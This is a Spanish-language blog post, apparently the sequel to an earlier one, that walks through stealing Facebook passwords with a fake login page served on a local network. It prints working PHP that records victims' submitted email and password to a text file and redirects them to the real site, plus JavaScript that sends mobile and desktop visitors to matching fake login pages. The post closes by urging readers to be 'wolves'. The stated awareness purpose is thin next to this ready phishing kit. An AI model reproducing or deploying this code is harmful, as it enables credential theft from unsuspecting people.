La última publicación fue
descrita de una forma muy general y considero que pasé por alto muchas
características técnicas importantes. También aprovecho para recalcar que el
hecho de explicar este método no es con la intención de que se replique o
aumente el robo de contraseñas, el objetivo es presentar el método y evitar este
tipo de estafas. Dejando claro todo esto vamos a la descripción técnica
mejorada.
En la anterior publicación (Cuida tu cuenta de facebook), no
comenté que este tipo de ataque en nuestro caso se realiza dentro de una red local, tanto el
atacante y la victima deben de estar conectados al mismo router o modem, también se podría realizar el ataque fuera de nuestra red, esto para que no sea que ya estén viendo feo al compañero de a lado (con ojos de pinc... chimoso, ratero, abusivo... $%&#) 😡, Por otra parte, podríamos realizar un ataque del hombre en el medio (man in de middle)
que permitiera direccionar el tráfico de la víctima al atacante, pero eso es
tema para otra publicación 😜.
Diagrama de una red de área local |
En la publicación anterior se describió que la forma de
hacer caer a la víctima es mandando un correo donde se encuentra un link
hacia el servidor de la maquina atacante, dentro del servidor de la maquina atacante se encuentra
la página falsa de Facebook; Que también comenté en dicha publicación como obteníamos
la página falsa de Facebook y que esa página redirigía a un archivo PHP llamado en este caso
post.php. Este peculiar archivo permite la captura de las contraseñas creando un archivo de texto, para nuestra prueba el archivo de texto se define como password.txt, después de la captura de la contraseña la victima es redirigida a la pagina original de facebook, dando un toque de !Aquí no paso nada¡ 😱. En la parte inferior se muestra la configuración de post.php.
Topología general del robo de cuentas de facebook
|
<?php
$file =fopen("passwors.txt","a");
$us= $_POST["email"];
$pass= $_POST["pass"];
echo "Usuario: ", $us, " Pass: ", $pass;
fwrite($file, print_r($_POST, true). PHP_EOL);
fclose($file);
header('Location: https://www.facebook.com');
?>
Cuando hice la anterior
demostración el equipo víctima era un dispositivo móvil con un sistema
operativo Android y la versión de la página de Facebook falsa que se presentaba
era para pc, aquí se podría romper el truco verdad? Espero que muchos en sus
mentes hayan pensado: “este loco cree que alguien me va hacer caer en la
estafa. Yo sé que cuando estoy en un Android o en cualquier dispositivo móvil
la versión de la página de login para
Facebook es diferente que la versión para PC”. Espero que mucha, mucha gente
haya tenido esa idea, y tiene toda la razón. Para poder detectar que tipo de
dispositivo accede a nuestra página falsa incluí un archivo llamado index.html,
dentro de este archivo existe una función en JavaScript que permite detectar el
tipo de dispositivo y direccionar a la página correspondiente de login de acuerdo a su tipo, asi que tendremos dos paginas de login falsa de facebook (Una para moviles y la versión PC). El objetivo de realizar esta adaptación es para demostrar que este tipo de ataque se puede adaptar perfectamente a los dispositivos móviles.
Topología general del robo de cuentas de facebook versión mejorada 😜 |
Código para detectar el tipo de dispositivo
<script>
var movil = {
Android: function() {
return navigator.userAgent.match(/Android/i); },
BlackBerry: function() {
return navigator.userAgent.match(/BlackBerry/i);},
iOS: function() {
return navigator.userAgent.match(/iPhone|iPad|iPod/i); },
Opera: function() {
return navigator.userAgent.match(/Opera Mini/i);},
Windows: function() {
return navigator.userAgent.match(/IEMobile/i);},
any: function() {
return (movil.Android() || movil.BlackBerry() || movil.iOS() || movil.Opera() || movil.Windows());
}}; function detectar(){
if(movil.any()){
window.location="http://"IP de servidor"/facebook/mfacebook.html";
}
else{//alert('PC');
window.location="http://"IP de servidor"/facebook/facebook.html";
}
}
window.onload = setTimeout("detectar();",100);
</script>
En el video demostrativo ya no
mando el correo malicioso con el link de la página falsa, únicamente asigno la dirección
IP de la maquina atacante en cada navegdor para ahorrar tiempo 😉. Si deseas ver el método
para redactar el correo falso puedes leer la publicación anterior (Cuida tu cuenta de facebook) y ver el video de Hackear facebook (Robo de contraseñas ).
Sin más que agregar me despido de ustedes y espero que sea un poco más explícita
esta publicación, Recuerden que dentro del internet hay unicamente dos especies: Los lobos y los corderos. No lo digo yo lo dice Chema alonso, así que vamos trasquilando nuestras melenas y poniéndonos nuestros colmillos 😈.